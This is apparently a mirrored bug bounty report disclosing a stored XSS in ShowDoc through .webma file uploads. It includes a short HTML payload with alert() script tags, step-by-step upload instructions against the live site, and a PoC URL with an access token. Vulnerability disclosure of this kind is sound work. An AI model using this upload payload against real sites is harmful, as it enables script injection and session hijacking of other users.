Lucene search

K

Sampritdas87EBE3E5F-2C86-44DE-B83E-2DDB6BBDA908

HistoryMar 14, 2022 - 2:57 p.m.

Stored XSS viva .webma file upload

2022-03-1414:57:47

sampritdas8

www.huntr.dev

16

stored xss

.webma file

file upload

showdoc.com.cn

session hijacking

sensitive data exposure

bugbounty

EPSS

0.001

Percentile

21.4%

Description

The application allows .webma files to upload which lead to stored XSS

Proof of Concept

1.First, open your text file/notepad and paste the below payload and save it as XSS.webma :

<html>

<script>alert(1337)</script>

<script>alert(document.domain)</script>

<script>alert(document.location)</script>

<script>alert(‘XSS_by_Samprit Das’)</script>

</html>

2.Then go to https://www.showdoc.com.cn/ and login with your account.

3.After that navigate to file library (https://www.showdoc.com.cn/attachment/index)

4.In the File Library page, click the Upload button and choose the XSS.webma

5.After uploading the file, click on the check button to open that file in a new tab.

PoC URL

https://img.showdoc.cc/622f4ea178cad_622f4ea178ca6.webma?e=1647273016&token=-YdeH6WvESHZKz-yUzWjO-uVV6A7oVrCN3UXi48F:XZXTcR3LpROlOxNKJOLwowyUqT0=

Impact

This allows attackers to execute malicious scripts in the user’s browser and it can lead to session hijacking, sensitive data exposure, and worse.

EPSS

0.001

Percentile

21.4%

Related for 7EBE3E5F-2C86-44DE-B83E-2DDB6BBDA908

nvd1 cvelist1 cve1 osv2 prion1 github1 cnvd1